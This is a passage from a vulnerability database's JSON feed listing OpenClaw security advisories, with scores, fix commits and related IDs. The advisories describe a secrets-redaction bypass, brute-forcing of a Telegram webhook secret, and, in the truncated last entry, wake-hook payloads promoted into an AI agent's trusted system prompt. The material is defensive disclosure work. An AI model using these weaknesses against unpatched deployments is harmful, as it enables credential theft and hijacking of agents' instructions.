2026.3.22`\n- First stable tag containing the fix: `v2026.3.22`\n\n## Fix Commit(s)\n- `eac93507c36ccd0c359fba18fa466ef6448be8a5` — 2026-03-23T00:56:44-07:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.22`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/eac93507c36ccd0c359fba18fa466ef6448be8a5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/eac93507c36ccd0c359fba18fa466ef6448be8a5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h5hg-h7rr-gpf3", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h5hg-h7rr-gpf3" }, { "reference_url": "https://github.com/advisories/GHSA-h5hg-h7rr-gpf3", "reference_id": "GHSA-h5hg-h7rr-gpf3", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h5hg-h7rr-gpf3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "GHSA-h5hg-h7rr-gpf3" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ddf9-tnrt-r7f2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89927?format=api", "vulnerability_id": "VCID-dfdk-dhwf-9yaj", "summary": "OpenClaw: config.get redaction bypass through sourceConfig and runtimeConfig aliases\n## Summary\n\nconfig.get redaction bypass through sourceConfig and runtimeConfig aliases.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nAn authenticated gateway client with config read access could receive unredacted secrets through alias fields that survived redaction, including provider API keys, gateway auth material, and channel credentials.\n\n## Technical Details\n\nThe fix explicitly overwrites `sourceConfig` and `runtimeConfig` with the same redacted copies used for `resolved` and `config`, including the invalid-snapshot branch. Tests now cover both alias fields.\n\n## Fix\n\nThe issue was fixed in #66030. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `86734ef93a2f25063371b04f1946eb300548acd4`\n- PR: #66030\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43528", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00081", "scoring_system": "epss", "scoring_elements": "0.24058", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26208", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26253", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43528" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/86734ef93a2f25063371b04f1946eb300548acd4", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:57Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/86734ef93a2f25063371b04f1946eb300548acd4" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/66030", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/66030" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8372-7vhw-cm6q", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:57Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8372-7vhw-cm6q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43528", "reference_id": "CVE-2026-43528", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43528" }, { "reference_url": "https://github.com/advisories/GHSA-8372-7vhw-cm6q", "reference_id": "GHSA-8372-7vhw-cm6q", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8372-7vhw-cm6q" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-redaction-bypass-via-sourceconfig-and-runtimeconfig-aliases", "reference_id": "openclaw-redaction-bypass-via-sourceconfig-and-runtimeconfig-aliases", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:57Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-redaction-bypass-via-sourceconfig-and-runtimeconfig-aliases" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109967?format=api", "purl": "pkg:npm/openclaw@2026.4.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14" } ], "aliases": [ "CVE-2026-43528", "GHSA-8372-7vhw-cm6q" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dfdk-dhwf-9yaj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90865?format=api", "vulnerability_id": "VCID-djqx-bwuu-4uc1", "summary": "OpenClaw: Telegram Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Secret\n## Summary\n\nTelegram Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Secret\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nTelegram webhook auth previously rejected bad secrets but did not throttle repeated guesses, allowing brute-force attempts against weak webhook secrets. Commit `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7` adds repeated-guess throttling before auth failure responses.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7`.\n\n## Fix Commit(s)\n\n- `c2c136ae9517ddd0789d742a0fdf4c10e8c729a7`\n\n## Release Process Note\n\n`2026.3.25` is the next planned OpenClaw release version in `package.json`. This advisory is being published ahead of that npm release so the draft is no longer blocked; once `2026.3.25` is published, the structured patched-version metadata will match the released artifact.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35628", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00071", "scoring_system": "epss", "scoring_elements": "0.21947", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00071", "scoring_system": "epss", "scoring_elements": "0.21996", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00071", "scoring_system": "epss", "scoring_elements": "0.2201", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35628" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/c2c136ae9517ddd0789d742a0fdf4c10e8c729a7", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:14:25Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/c2c136ae9517ddd0789d742a0fdf4c10e8c729a7" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vcx4-4qxg-mfp4", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:14:25Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vcx4-4qxg-mfp4" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35628", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35628" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-telegram-webhook-rate-limiting", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:14:25Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-telegram-webhook-rate-limiting" }, { "reference_url": "https://github.com/advisories/GHSA-vcx4-4qxg-mfp4", "reference_id": "GHSA-vcx4-4qxg-mfp4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vcx4-4qxg-mfp4" } ], "fixed_packages": [], "aliases": [ "CVE-2026-35628", "GHSA-vcx4-4qxg-mfp4" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-djqx-bwuu-4uc1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90015?format=api", "vulnerability_id": "VCID-dmse-bb22-rkcj", "summary": "OpenClaw: Authenticated `/hooks/wake` and mapped `wake` payloads are promoted into the trusted `System:` prompt channel\n## Impact\n\nAuthenticated `/hooks/wake` and mapped `wake` payloads are promoted into the trusted `System:` prompt channel.\n\nAn authenticated wake hook or mapped wake payload could be promoted into the trusted System prompt 